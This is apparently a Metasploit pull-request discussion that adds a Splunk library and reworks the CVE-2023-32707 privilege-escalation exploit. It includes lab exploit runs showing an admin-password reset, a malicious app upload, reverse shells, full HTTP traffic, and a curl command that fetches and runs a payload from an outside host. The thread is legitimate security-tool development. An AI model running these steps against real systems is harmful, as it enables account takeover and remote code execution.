Add Splunk library

[errorxyz]

Fixes #18643

• This PR adds a Splunk mixin with splunk_login, splunk_upload_app, splunk_and_online?, splunk_version, splunk_is_auth_required?, splunk_default_creds, splunk_login_with_default_creds methods, mostly copy pasted from their references in the issue.
• Updates splunk_privilege_escalation_cve_2023_32707 to use the library.
• Also fixes a minor bug in the module's splunk_change_password method where the method used incorrect method name with incorrect parameters to login when cookie was unavailable. (link)

Link to setup environment here

Once the library structure is finalised and merged, we can work on the other modules.

Before

1. Start msfconsole
2. use exploit/multi/http/splunk_privilege_escalation_cve_2023_32707
3. set required options
4. set autocheck false
5. run

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[-] Exploit failed: NoMethodError undefined method `do_login' for #<Module:exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 datastore=[#<Msf::ModuleDataStoreWithFallbacks:0x00007f6bcb263ca0 @options={"WORKSPACE"=>#<Msf::OptString:0x00007f6beb4525c8 @name="WORKSPACE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @fallbacks=[], @required=false, @desc="Specify the workspace for this module", @default=nil, @enums=[], @owner=Msf::Module>, "VERBOSE"=>#<Msf::OptBool:0x00007f6beb451628 @name="VERBOSE", @advanced=true, @evasion=false, @aliases=[], @max_length=nil, @conditions=[], @fallbacks=[], @required=false, @desc="Enable detailed status messages", @default=false, @enums=[], @owner=Msf::Module>, "WfsDelay"=>#<Msf::OptInt:0x00007f6be8165b38 @name="WfsDelay", @advanced=true
...
snipped output

After

1. Start msfconsole
2. use exploit/multi/http/splunk_privilege_escalation_cve_2023_32707
3. set required options
4. set autocheck false
5. run

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to password
[+] Password of the user 'admin' has been changed to password
[*] Session ID 5 (172.17.0.1:4444 -> 172.17.0.2:54050) processing AutoRunScript 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
[!] SESSION may not be compatible with this module:
[!]  * Unknown session platform
[*] Executing cd on #<Session:shell 172.17.0.2:54050 (172.17.0.2) "">...
[*] Response: 
[*] Command shell session 5 opened (172.17.0.1:4444 -> 172.17.0.2:54050) at 2024-01-19 01:53:40 +0530

id
uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)

[errorxyz]

Sorry for all the force pushes, had some weird indentation issues. I've made all the reviewed changes and some more changes in the splunk_login method for logging purposes.

[jheysel-r7]

Hey @errorxyz. I noticed there were a couple references to cookies_hash['splunkweb_csrf_token_8000']. Do those references need to be changed to cookies_hash['splunkweb_csrf_token_#{datastore['RPORT']}'] to match the pattern mentioned here: #18715 (comment) ?

Also when testing I was getting the following error and was wondering if you have seen this before/ know if the module should be sending the old password when attempting change the password:

[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.

The error seems to be caused by a 400 response with the message body:

{"messages":[{"type":"ERROR","text":"Missing old password."}]}

Full output here:

Testing output

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET /en-US/account/login HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 17:19:14 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 13515
Vary: Cookie
Connection: Keep-Alive
Set-Cookie: cval=930975352; Path=/en-US/account/, splunkweb_uid=9D2D5AAA-8044-4F43-9978-563BAF116323; Path=/en-US/account; Max-Age=157680000; Expires=Sun, 18 Feb 2029 17:19:14 GMT
X-UA-Compatible: IE=edge
X-Frame-Options: SAMEORIGIN
Server: Splunkd

<!doctype html>
<!--[if lt IE 7]> <html class="no-js ie  lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>    <html class="no-js ie7 lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]>    <html class="no-js ie8 lt-ie9"> <![endif]-->
<!--[if IE 9]>    <html class="no-js ie9"> <![endif]-->
<!--[if gt IE 9]><!--> <html class="no-js"> <!--<![endif]-->
<head>
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <title></title>
    <meta name="description" content="listen to your data" />
    <meta name="author" content="Splunk Inc." />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="referrer" content="origin" />
    <script type="text/json" id="splunkd-partials">
{"/services/session":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"hasLoggedIn":true,"cval":930975352,"time":1708449554,"lang":"en-US","bump":0,"splunkweb_uid":"9D2D5AAA-8044-4F43-9978-563BAF116323"}}],"generator":{}},"/services/server/info":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"instance_type":"download","product_type":"enterprise","staticAssetId":"A8C1DD7E0FAD5BDC3CE647995FAEE58A9A6DAD70F097341AC3A16E2705E962D1","isFree":false,"isTrial":true,"licenseState":"OK"}}],"generator":{}},"/configs/conf-web":{"messages":[],"links":{},"entry":[{"fields":{"optional":[],"required":[],"wildcard":[]},"acl":{"perms":{"write":[],"read":[]}},"links":{},"content":{"enable_autocomplete_login":false,"updateCheckerBaseURL":"https://quickdraw.splunk.com/js/","login_content":"","root_endpoint":"","customFavicon":"","loginCustomLogo":"","loginBackgroundImageOption":"default","loginCustomBackgroundImage":"","loginFooterOption":"default","loginFooterText":"","loginDocumentTitleOption":"default","loginDocumentTitleText":"","firstTimeLoginMessageOption":"default","firstTimeLoginMessage":"","loginPasswordHint":"","minify_js":true,"minify_css":true}}],"generator":{}}}
    </script>
    <script>
        if(typeof JSON!=='object'){JSON={};}(function(){'use strict';function f(n){return n<10?'0'+n:n;}if(typeof Date.prototype.toJSON!=='function'){Date.prototype.toJSON=function(){return isFinite(this.valueOf())?this.getUTCFullYear()+'-'+f(this.getUTCMonth()+1)+'-'+f(this.getUTCDate())+'T'+f(this.getUTCHours())+':'+f(this.getUTCMinutes())+':'+f(this.getUTCSeconds())+'Z':null;};String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(){return this.valueOf();};}var cx,escapable,gap,indent,meta,rep;function quote(string){escapable.lastIndex=0;return escapable.test(string)?'"'+string.replace(escapable,function(a){var c=meta[a];return typeof c==='string'?c:'\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);})+'"':'"'+string+'"';}function str(key,holder){var i,k,v,length,mind=gap,partial,value=holder[key];if(value&&typeof value==='object'&&typeof value.toJSON==='function'){value=value.toJSON(key);}if(typeof rep==='function'){value=rep.call(holder,key,value);}switch(typeof value){case'string':return quote(value);case'number':return isFinite(value)?String(value):'null';case'boolean':case'null':return String(value);case'object':if(!value){return'null';}gap+=indent;partial=[];if(Object.prototype.toString.apply(value)==='[object Array]'){length=value.length;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null';}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v;}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){if(typeof rep[i]==='string'){k=rep[i];v=str(k,value);if(v){partial.push(quote(k)+(gap?': ':':')+v);}}}}else{for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=str(k,value);if(v){partial.push(quote(k)+(gap?': ':':')+v);}}}}v=partial.length===0?'{}':gap?'{\n'+gap+partial.join(',\n'+gap)+'\n'+mind+'}':'{'+partial.join(',')+'}';gap=mind;return v;}}if(typeof JSON.stringify!=='function'){escapable=/[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;meta={'\b':'\\b','\t':'\\t','\n':'\\n','\f':'\\f','\r':'\\r','"':'\\"','\\':'\\\\'};JSON.stringify=function(value,replacer,space){var i;gap='';indent='';if(typeof space==='number'){for(i=0;i<space;i+=1){indent+=' ';}}else if(typeof space==='string'){indent=space;}rep=replacer;if(replacer&&typeof replacer!=='function'&&(typeof replacer!=='object'||typeof replacer.length!=='number')){throw new Error('JSON.stringify');}return str('',{'':value});};}if(typeof JSON.parse!=='function'){cx=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;JSON.parse=function(text,reviver){var j;function walk(holder,key){var k,v,value=holder[key];if(value&&typeof value==='object'){for(k in value){if(Object.prototype.hasOwnProperty.call(value,k)){v=walk(value,k);if(v!==undefined){value[k]=v;}else{delete value[k];}}}}return reviver.call(holder,key,value);}text=String(text);cx.lastIndex=0;if(cx.test(text)){text=text.replace(cx,function(a){return'\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);});}if(/^[\],:{}\s]*$/.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,'@').replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,']').replace(/(?:^|:|,)(?:\s*\[)+/g,''))){j=eval('('+text+')');return typeof reviver==='function'?walk({'':j},''):j;}throw new SyntaxError('JSON.parse');};}}());        var __splunkd_partials__ = JSON.parse(document.getElementById('splunkd-partials').innerHTML);
        //HTML helpers
        var script = function(attributes) {
            var container = document.createElement('div'),
                content = document.createElement('script');
            content.setAttribute('type', 'text/template');
            for (var attribute in attributes) {
                if (attributes.hasOwnProperty(attribute) && attribute!=='text/javascript') {
                    if (attribute==='innerText') {
                        content.innerHTML = attributes[attribute];
                    } else {
                        content.setAttribute(attribute, attributes[attribute]);
                    }
                }
            }
            container.appendChild(content)
            return container.innerHTML.replace(/ type=["]?text\/template["]?/, '');
        }
        //URI route functions
        var baseRoute = function(path) {
            var url = '',
                rootEndpoint  = __splunkd_partials__['/configs/conf-web'].entry[0].content.root_endpoint || '';
            //strip leading '/'
            rootEndpoint = rootEndpoint.replace(/\/^/, '');
            //strip trailing '/'
            rootEndpoint = rootEndpoint.replace(/\/$/, '');
            if (rootEndpoint) {
                url = '/' + rootEndpoint;
            }
            return url + '/' + encodeURIComponent(__splunkd_partials__['/services/session'].entry[0].content.lang) +  path
        };
        var buildBump = (function() {
            var bump = __splunkd_partials__['/services/session'].entry[0].content.bump,
                buildBump = '@' + __splunkd_partials__['/services/server/info'].entry[0].content.staticAssetId;
            if (bump) {
                buildBump += '.' + bump;
            }
            return buildBump;
        }());
        var staticRoute = function(path) {
            return baseRoute('/static/' + buildBump + path);
        };
        //page/handler
        var rootPath = baseRoute('');
        var pathArray = window.location.pathname.substring(rootPath.length+1).split('/');
        var page='';

        //login, logout and password_change share a single page router (account) and do not support non-minified mode
        if (pathArray[0].toLowerCase() === 'account') {
            if(pathArray[1].toLowerCase() === 'status'){
                page = 'accountstatus';
            }else{
                page = 'account';
                __splunkd_partials__['/configs/conf-web'].entry[0].content.minify_css = true;
            }
        } else {
            page = pathArray[1];
        }
        //DOM manipulation
        document.documentElement.setAttribute('lang', __splunkd_partials__['/services/session'].entry[0].content.lang);
    </script>
    <script>
       var product_type = __splunkd_partials__['/services/server/info'].entry[0].content.product_type,
           customFavicon = __splunkd_partials__['/configs/conf-web'].entry[0].content.customFavicon,
           splunkCssTheme='enterprise',
           faviconFile = '/img/';
       if (!customFavicon) {
           if (product_type == 'hunk') {
               faviconFile += 'favicon_hunk.ico';
           } else if (product_type.indexOf('lite') != -1) {
               faviconFile += 'favicon_lite.ico';
               splunkCssTheme = 'lite';
           } else {
               faviconFile += 'favicon.ico';
           }
       } else {
           faviconFile = '/app/';
           if (customFavicon.indexOf(":") != -1) {
               faviconFile += customFavicon.substring(0,customFavicon.indexOf(":"));
               faviconFile += '/';
               faviconFile += customFavicon.substring(customFavicon.indexOf(":")+1);
           } else {
               faviconFile += 'search/';
               faviconFile += customFavicon;
           }
       }
       document.write('<link rel="shortcut icon" href="' + staticRoute(faviconFile) + '" />');
       document.write('<link rel="apple-touch-icon-precomposed" sizes="57x57" href="' + staticRoute('/img/bookmark/apple-icon-57x57-precomposed.png')  + '" />');
       document.write('<link rel="apple-touch-icon-precomposed" sizes="72x72" href="' + staticRoute('/img/bookmark/apple-icon-72x72-precomposed.png')  + '" />');
       document.write('<link rel="apple-touch-icon-precomposed" sizes="114x114" href="' + staticRoute('/img/bookmark/apple-icon-114x114-precomposed.png')  + '" />');
       document.write('<link rel="apple-touch-icon-precomposed" sizes="144x144" href="' + staticRoute('/img/bookmark/apple-icon-144x144-precomposed.png') + '" />');
       document.write('<meta name="msapplication-TileColor" content="#5CC05C">');
       document.write('<meta name="msapplication-TileImage" content="' + staticRoute('/img/bookmark/ms-tileicon-144x144.png') + '">');
       var page_css = page.replace(/_/g,'-');
       document.write('<link rel="stylesheet" type="text/css" href="' + staticRoute('/build/css/bootstrap-' + splunkCssTheme + '.css') + '" />');
    </script>
</head>
<body>
    <!-- live to code, code to live... -->
    <div id="browser-not-supported" style="display:none;"></div>
    <script>
          document.body.className = (__splunkd_partials__['/services/server/info'].entry[0].content.product_type.indexOf('lite')!=-1) ? 'lite' : __splunkd_partials__['/services/server/info'].entry[0].content.product_type;
          document.write(script({src: baseRoute('/config?autoload=1'), crossorigin: 'use-credentials'}));
          document.write(script({src: staticRoute('/js/i18n.js')}));
          document.write(script({src: baseRoute('/i18ncatalog?autoload=1' + '&version=' + buildBump)}));

          // Before bootstrapping the page, add an error event listener. If we cannot bootstrap the
          // page, display the browser not supported message.
          var oldWindowOnError = window.onerror;
          window.onerror = function() {
              if (oldWindowOnError) {
                  oldWindowOnError.apply(null, arguments);
              }
              var notSupportedEl = document.getElementById('browser-not-supported');
              // NOTE: The following translations must be duplicated in routers/Account.js in order to work correctly.
              // If you make changes to these strings, also update their counterpart in Account.js.
              notSupportedEl.innerHTML = ([
                  '<p>',
                  gettext('This browser is not supported by Splunk.'),
                  '<br />',
                  gettext('Please refer to the list of %s.').replace('%s', '<a href="#">' + gettext('Supported Browsers') + '</a>'),
                  '</p>'
              ]).join('');
              var docLinkEl = notSupportedEl.getElementsByTagName('a')[0];
              docLinkEl.href = baseRoute('/help?location=learnmore.systemrequirements');
              notSupportedEl.style.display = 'block';
          }
          if (product_type.indexOf('lite') !== -1) {
              document.write(script({src: staticRoute('/build/pages/lite/common.js')}));
              document.write(script({src: staticRoute('/build/pages/lite/' + page + '.js')}));
          } else {
              document.write(script({src: staticRoute('/build/pages/enterprise/common.js')}));
              document.write(script({src: staticRoute('/build/pages/enterprise/' + page + '.js')}));
          }
    </script>
    <script>
        // Remove the error handler added at the begining of bootrappinng.
        window.onerror = oldWindowOnError;
    </script>
    <noscript>
         <p>Splunk relies on JavaScript to function properly.<br>Please enable JavaScript and then refresh the page to login.</p>
    </noscript>
</body>
</html>

####################
# Request:
####################
POST /en-US/account/login HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Cookie: session_id_8000=0292937535538578833676800130797032942623; cval=930975352; splunkweb_uid=9D2D5AAA-8044-4F43-9978-563BAF116323;
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

username=admin&password=password&cval=930975352
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 17:19:14 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 12
Vary: Cookie
Connection: Keep-Alive
Set-Cookie: splunkd_8000=lMbd6vakO4uRhLRMAVqgwsFeGtzi3SJKk8Px_yzJV_aVdmB4dHALLZtxLXRlGiM40MGqeprOP5MqxHoIppOkNnHMA18mTb8vPhRkcf2gWUZxU2PNfK5HCrqzu8p1aBa; Path=/; HttpOnly; Max-Age=3600; Expires=Tue, 20 Feb 2024 18:19:14 GMT, splunkweb_csrf_token_8000=7923092379505229993; Path=/; Max-Age=157680000; Expires=Sun, 18 Feb 2029 17:19:14 GMT
X-Frame-Options: SAMEORIGIN
Server: Splunkd

{"status":0}
[+] SUCCESSFUL LOGIN. 'admin' : 'password'
####################
# Request:
####################
GET /en-US/splunkd/__raw/services/authentication/users/admin?output_mode=json HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Cookie: session_id_8000=0292937535538578833676800130797032942623; cval=930975352; splunkweb_uid=9D2D5AAA-8044-4F43-9978-563BAF116323; splunkd_8000=lMbd6vakO4uRhLRMAVqgwsFeGtzi3SJKk8Px_yzJV_aVdmB4dHALLZtxLXRlGiM40MGqeprOP5MqxHoIppOkNnHMA18mTb8vPhRkcf2gWUZxU2PNfK5HCrqzu8p1aBa; splunkweb_csrf_token_8000=7923092379505229993;


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 20 Feb 2024 17:19:14 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 4451
Vary: Cookie
Connection: Keep-Alive
Set-Cookie: splunkd_8000=lMbd6vakO4uRhLRMAVqgwsFeGtzi3SJKk8Px_yzJV_aVdmB4dHALLZtxLXRlGiM40MGqeprOP5MqxHoIppOkNnHMA18mTb8vPhRkcf2gWUZxU2PNfK5HCrqzu8p1aBa; Path=/; HttpOnly; Max-Age=3600; Expires=Tue, 20 Feb 2024 18:19:14 GMT, splunkweb_csrf_token_8000=7923092379505229993; Path=/; Max-Age=157680000; Expires=Sun, 18 Feb 2029 17:19:14 GMT
X-Frame-Options: SAMEORIGIN
Server: Splunkd

{"links":{"create":"/services/authentication/users/_new"},"origin":"https://127.0.0.1:8000/services/authentication/users","updated":"2024-02-20T17:19:14+00:00","generator":{"build":"de405f4a7979","version":"9.0.4"},"entry":[{"name":"admin","id":"https://127.0.0.1:8000/services/authentication/users/admin","updated":"1970-01-01T00:00:00+00:00","links":{"alternate":"/services/authentication/users/admin","list":"/services/authentication/users/admin","edit":"/services/authentication/users/admin"},"author":"system","acl":{"app":"","can_list":true,"can_write":true,"modifiable":false,"owner":"system","perms":{"read":["*"],"write":["*"]},"removable":false,"sharing":"system"},"fields":{"required":[],"optional":["defaultApp","email","force-change-pass","lang","locked-out","oldpassword","password","realname","restart_background_jobs","roles","search_assistant","search_auto_format","search_line_numbers","search_syntax_highlighting","search_use_advanced_editor","theme","tz"],"wildcard":[]},"content":{"capabilities":["accelerate_datamodel","accelerate_search","admin_all_objects","apps_backup","apps_restore","change_authentication","change_own_password","delete_messages","dispatch_rest_to_indexers","edit_authentication_extensions","edit_bookmarks_mc","edit_cmd","edit_deployment_client","edit_deployment_server","edit_dist_peer","edit_encryption_key_provider","edit_field_filter","edit_forwarders","edit_global_banner","edit_health","edit_httpauths","edit_indexer_cluster","edit_indexerdiscovery","edit_ingest_rulesets","edit_input_defaults","edit_kvstore","edit_local_apps","edit_log_alert_event","edit_manager_xml","edit_metric_schema","edit_metrics_rollup","edit_modinput_journald","edit_monitor","edit_own_objects","edit_restmap","edit_roles","edit_scripted","edit_search_concurrency_all","edit_search_head_clustering","edit_search_schedule_priority","edit_search_schedule_window","edit_search_scheduler","edit_search_server","edit_server","edit_server_crl","edit_sourcetypes","edit_splunktcp","edit_splunktcp_ssl","edit_splunktcp_token","edit_statsd_transforms","edit_tcp","edit_tcp_stream","edit_telemetry_settings","edit_token_http","edit_tokens_all","edit_tokens_own","edit_tokens_settings","edit_udp","edit_upload_and_index","edit_user","edit_view_html","edit_web_features","edit_web_settings","edit_workload_policy","edit_workload_pools","edit_workload_rules","embed_report","export_results_is_visible","fsh_manage","fsh_search","get_diag","get_metadata","get_typeahead","indexes_edit","input_file","install_apps","license_edit","license_tab","license_view_warnings","list_accelerate_search","list_all_objects","list_cascading_plans","list_deployment_client","list_deployment_server","list_dist_peer","list_forwarders","list_health","list_httpauths","list_indexer_cluster","list_indexerdiscovery","list_ingest_rulesets","list_inputs","list_introspection","list_metrics_catalog","list_pipeline_sets","list_remote_input_queue","list_remote_output_queue","list_search_head_clustering","list_search_scheduler","list_settings","list_storage_passwords","list_token_http","list_tokens_all","list_tokens_own","list_workload_policy","list_workload_pools","list_workload_rules","merge_buckets","metric_alerts","never_expire","never_lockout","output_file","pattern_detect","read_internal_libraries_settings","refresh_application_licenses","request_remote_tok","rest_access_server_endpoints","rest_apps_management","rest_apps_view","rest_properties_get","rest_properties_set","restart_reason","restart_splunkd","rtsearch","run_collect","run_commands_ignoring_field_filter","run_custom_command","run_debug_commands","run_dump","run_mcollect","run_msearch","run_sendalert","schedule_rtsearch","schedule_search","search","search_process_config_refresh","select_workload_pools","splunk_assist_admin","upload_lookup_files","upload_mmdb_files","use_file_operator","use_remote_proxy","web_debug"],"defaultApp":"launcher","defaultAppIsUserOverride":false,"defaultAppSourceRole":"system","eai:acl":null,"email":"[email protected]","lang":"","last_successful_login":1708449554,"locked-out":false,"password":"********","realname":"Administrator","restart_background_jobs":null,"roles":["admin"],"search_assistant":"compact","search_auto_format":false,"search_line_numbers":false,"search_syntax_highlighting":"light","search_use_advanced_editor":true,"theme":"enterprise","type":"Splunk","tz":""}}],"paging":{"total":1,"perPage":30,"offset":0},"messages":[]}
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'admin' has 'edit_user' capability
[*] Changing 'admin' password to qJjRgFBx
####################
# Request:
####################
POST /en-US/splunkd/__raw/services/authentication/users/admin HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Cookie: session_id_8000=0292937535538578833676800130797032942623; cval=930975352; splunkweb_uid=9D2D5AAA-8044-4F43-9978-563BAF116323; splunkd_8000=lMbd6vakO4uRhLRMAVqgwsFeGtzi3SJKk8Px_yzJV_aVdmB4dHALLZtxLXRlGiM40MGqeprOP5MqxHoIppOkNnHMA18mTb8vPhRkcf2gWUZxU2PNfK5HCrqzu8p1aBa; splunkweb_csrf_token_8000=7923092379505229993;
X-Splunk-Form-Key: 7923092379505229993
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

output_mode=json&password=qJjRgFBx&force-change-pass=0&locked-out=0
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Tue, 20 Feb 2024 17:19:14 GMT
Expires: Thu, 26 Oct 1978 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Content-Type: application/json; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 62
Vary: Cookie
Connection: Keep-Alive
Set-Cookie: splunkd_8000=lMbd6vakO4uRhLRMAVqgwsFeGtzi3SJKk8Px_yzJV_aVdmB4dHALLZtxLXRlGiM40MGqeprOP5MqxHoIppOkNnHMA18mTb8vPhRkcf2gWUZxU2PNfK5HCrqzu8p1aBa; Path=/; HttpOnly; Max-Age=3600; Expires=Tue, 20 Feb 2024 18:19:14 GMT, splunkweb_csrf_token_8000=7923092379505229993; Path=/; Max-Age=157680000; Expires=Sun, 18 Feb 2029 17:19:14 GMT
X-Frame-Options: SAMEORIGIN
Server: Splunkd

{"messages":[{"type":"ERROR","text":"Missing old password."}]}

[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.

[errorxyz]

Thanks for pointing out the token mistake, I'll make the changes accordingly

I went through your testing output, and I noticed that you were using admin:password to login- so I think you've set USERNAME to admin and PASSWORD to password instead of setting USERNAME to redway and PASSWORD to changeme(if you've followed the link in the PR comment to setup). The TARGET_USER is supposed to be the username whose password we want to change(typically admin) and USERNAME is the non-admin user whose creds we already have access to(user with the special privs).

Edit: I was able to get the same error after using admin:password:

[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'admin' : 'password'
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'admin' has 'edit_user' capability
[*] Changing 'admin' password to password
[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
[*] Exploit completed, but no session was created.

[smcintyre-r7]

Change are looking good to me now. I was able to test that the updated exploit module is working as expected. I tried the default payload as well as cmd/linux/http/x64/meterpreter/reverse_tcp.

In both cases it worked. In the output below, you may notice Meterpreter is failing with error 2 but I'm confident that's unrelated since this changes no Meterpreter code.

msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > run

[*] Command to run on remote host: curl -so ./cVDoIUbawOYf http://192.168.159.128:8080/km47K8h77L_ZqYnoDxpGCA; chmod +x ./cVDoIUbawOYf; ./cVDoIUbawOYf &
[*] Fetch Handler listening on 192.168.159.128:8080
[*] HTTP server started
[*] Adding resource /km47K8h77L_ZqYnoDxpGCA
[*] Started reverse TCP handler on 192.168.159.128:4455 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] SUCCESSFUL LOGIN. 'redway' : 'changeme'
[*] Detected Splunk version 9.0.4 which is vulnerable
[+] The target is vulnerable. User 'redway' has 'edit_user' capability
[*] Changing 'admin' password to jHZMUwTymGy
[+] Password of the user 'admin' has been changed to jHZMUwTymGy
[+] SUCCESSFUL LOGIN. 'admin' : 'jHZMUwTymGy'
[*] Splunk app uploaded successfully
[*] Client 192.168.159.128 requested /km47K8h77L_ZqYnoDxpGCA
[*] Sending payload to 192.168.159.128 (curl/7.61.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.128
[*] Session ID 4 (192.168.159.128:4455 -> 192.168.159.128:46088) processing AutoRunScript 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
[*] Executing cd on #<Session:meterpreter 192.168.159.128:46088 (192.168.159.128) "splunk @ 10.0.2.100">...
[*] Response: 
[*] Meterpreter session 4 opened (192.168.159.128:4455 -> 192.168.159.128:46088) at 2024-03-05 16:11:59 -0500
[*] Cleaning up: destroying job 1709673118.9
[*] Cleaning up: removing app zaamdox

meterpreter > getuid
Server username: splunk
meterpreter > sysinfo
[-] stdapi_fs_getwd: Operation failed: 2
meterpreter > pwd
[-] stdapi_fs_getwd: Operation failed: 2

Thanks for taking this project on! I'll have this landed shortly.

[smcintyre-r7]

Release Notes

This adds a Splunk library for use by future modules. It also updates the existing exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 module to use it.